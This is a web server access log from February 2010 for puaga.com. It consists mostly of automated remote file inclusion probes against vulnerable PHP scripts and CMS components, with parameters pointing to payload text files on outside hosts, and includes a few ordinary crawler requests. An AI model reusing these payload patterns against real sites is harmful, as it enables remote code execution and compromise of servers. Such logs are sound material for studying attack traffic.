210.205.6.233 - - [18/Feb/2010:04:20:35 -0800] "GET /logs/access_100201.log%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:04:20:35 -0800] "GET /logs//////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 4951 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [18/Feb/2010:04:20:35 -0800] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:20:39 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:20:39 -0800] "GET /logs/access_100114.log%20%20//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:20:39 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:20:57 -0800] "GET /logs/access_100129.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [18/Feb/2010:04:20:59 -0800] "GET /logs/access_100119.log%20%20//bbs/write_update.php?board_skin_path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:12 -0800] "GET /logs/access_100130.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:12 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:13 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:21:18 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:21:18 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:21:18 -0800] "GET /logs/access_100124.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:24 -0800] "GET /snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:24 -0800] "GET /logs//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:24 -0800] "GET /logs/access_100130.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:21:38 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:22:00 -0800] "GET /logs/access_100127.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:22:02 -0800] "GET /logs/access_100123.log%20%20//?path%5Bdocroot%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:22:02 -0800] "GET /?path%5Bdocroot%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:22:03 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:27 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:27 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:27 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:27 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:30 -0800] "GET /logs//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:30 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:30 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.36.175.10 - - [18/Feb/2010:04:22:30 -0800] "GET /logs/access_100201.log%20%20//administrator/components/com_webring/admin.webring.docs.php?component_dir=http://defato.freehostia.com/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:22:55 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:22:55 -0800] "GET /logs/access_100208.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:22:55 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:04:22:55 -0800] "GET /logs/access_100119.log//index.php?DOCUMENT_ROOT=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:22:56 -0800] "GET /logs/access_100107.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.199.140.158 - - [18/Feb/2010:04:22:57 -0800] "GET /logs/access_100111.log//index.php?DOCUMENT_ROOT=http://cs.kku.ac.kr/data/member/as/1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:23:00 -0800] "GET /logs/access_100129.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:23:18 -0800] "GET /logs/access_100127.log%20%20/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:23:18 -0800] "GET /logs/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:23:18 -0800] "GET /errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:23:38 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:23:42 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.108.61.176 - - [18/Feb/2010:04:23:56 -0800] "GET /errors.php?error=http://test.bigshop.cz/uploaded/injek.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:25:24 -0800] "GET /logs/access_100208.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:25:36 -0800] "GET /logs/access_100208.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:25:42 -0800] "GET /logs/access_100129.log%20%20//?path%5Bdocroot%5D=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:25:44 -0800] "GET /logs/access_100127.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.239.124.204 - - [18/Feb/2010:04:25:54 -0800] "GET /logs/access_100127.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:25:57 -0800] "GET /logs/access_100124.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:26:02 -0800] "GET /logs/access_100206.log///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.92.96.98 - - [18/Feb/2010:04:27:03 -0800] "GET /ideal/forum/posting.php?mode=newtopic&f=5 HTTP/1.0" 404 5258 "http://puaga.com/ideal/forum/posting.php?mode=newtopic&f=5" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:27:04 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
80.92.96.98 - - [18/Feb/2010:04:27:05 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "puaga.com"
70.84.146.106 - - [18/Feb/2010:04:27:59 -0800] "GET /errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:28:00 -0800] "GET /logs/errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:28:00 -0800] "GET /logs/access_100111.log%20%20/errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:28:00 -0800] "GET /logs/access_100119.log%20%20/errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:28:05 -0800] "GET /logs/access_100208.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
205.205.227.101 - - [18/Feb/2010:04:28:11 -0800] "GET /logs/access_100127.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:29:09 -0800] "GET /logs/access_100208.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [18/Feb/2010:04:29:34 -0800] "GET /logs/access_100127.log//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:29:50 -0800] "GET /index.php?DOCUMENT_ROOT=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:29:51 -0800] "GET /logs/access_100119.log%20%20//index.php?DOCUMENT_ROOT=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:29:51 -0800] "GET /logs/access_100111.log%20%20//index.php?DOCUMENT_ROOT=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:29:51 -0800] "GET /logs//index.php?DOCUMENT_ROOT=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [18/Feb/2010:04:30:00 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:04:30:00 -0800] "GET /orange_g/forum/viewtopic.php?p=25310 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [18/Feb/2010:04:30:09 -0800] "GET /orange_g/forum/viewtopic.php?p=25290 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
213.251.189.204 - - [18/Feb/2010:04:30:44 -0800] "GET /logs/access_100201.log%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:30:44 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:30:44 -0800] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [18/Feb/2010:04:30:52 -0800] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [18/Feb/2010:04:30:52 -0800] "GET /logs/access_100201.log%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [18/Feb/2010:04:30:52 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:31:14 -0800] "GET /logs//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:31:14 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [18/Feb/2010:04:31:14 -0800] "GET /logs/access_100201.log%20%20//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:05 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:05 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:05 -0800] "GET /logs/access_100112.log/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:09 -0800] "GET /logs/access_100107.log/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:40 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:40 -0800] "GET /logs/access_100112.log/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:40 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:41 -0800] "GET /logs/access_100107.log/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:46 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:46 -0800] "GET /logs/access_100112.log%20%20/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:46 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:33:46 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:34:37 -0800] "GET /logs/access_100112.log%20%20/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:34:37 -0800] "GET /logs/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:34:37 -0800] "GET /administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [18/Feb/2010:04:34:38 -0800] "GET /logs/access_100107.log%20%20/administrator/components/com_jreactions/langset.php?comPath=http://study.de/editor/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.205 - - [18/Feb/2010:04:34:43 -0800] "GET /logs/access_100201.log//public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://youngdukob.com/bbs/id1.asp?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:34:55 -0800] "GET /logs/access_100119.log/errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.84.146.106 - - [18/Feb/2010:04:34:55 -0800] "GET /logs/access_100111.log/errors.php?error=http://www.sun-angel.ru//js/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:04:36:49 -0800] "GET ///download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:04:36:49 -0800] "GET /logs////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:04:36:53 -0800] "GET /logs/access_100119.log////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.115.131.17 - - [18/Feb/2010:04:37:08 -0800] "GET /logs/access_100204.log////download.php?board_skin_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:37:44 -0800] "GET /scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:37:45 -0800] "GET /logs/scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:37:49 -0800] "GET /logs/scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:37:49 -0800] "GET /scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:38:46 -0800] "GET /Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:38:46 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:38:46 -0800] "GET /logs/access_100114.log//Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:39:16 -0800] "GET /scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
124.193.89.226 - - [18/Feb/2010:04:39:17 -0800] "GET /logs/scanhttp://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.puaga.com"
67.205.49.120 - - [18/Feb/2010:04:39:21 -0800] "GET /logs/access_100206.log//Neos_Chronos/header.php?base_folder=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:41:26 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
88.191.43.7 - - [18/Feb/2010:04:41:26 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:41:43 -0800] "GET /logs//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
213.188.133.214 - - [18/Feb/2010:04:41:43 -0800] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.sinhvienqb.com/news/test.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.puaga.com"
79.99.44.89 - - [18/Feb/2010:04:42:16 -0800] "GET /logs/access_100127.log/errors.php?error=http://www.foodntop.com//bbs/data/cook/thumbnail/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
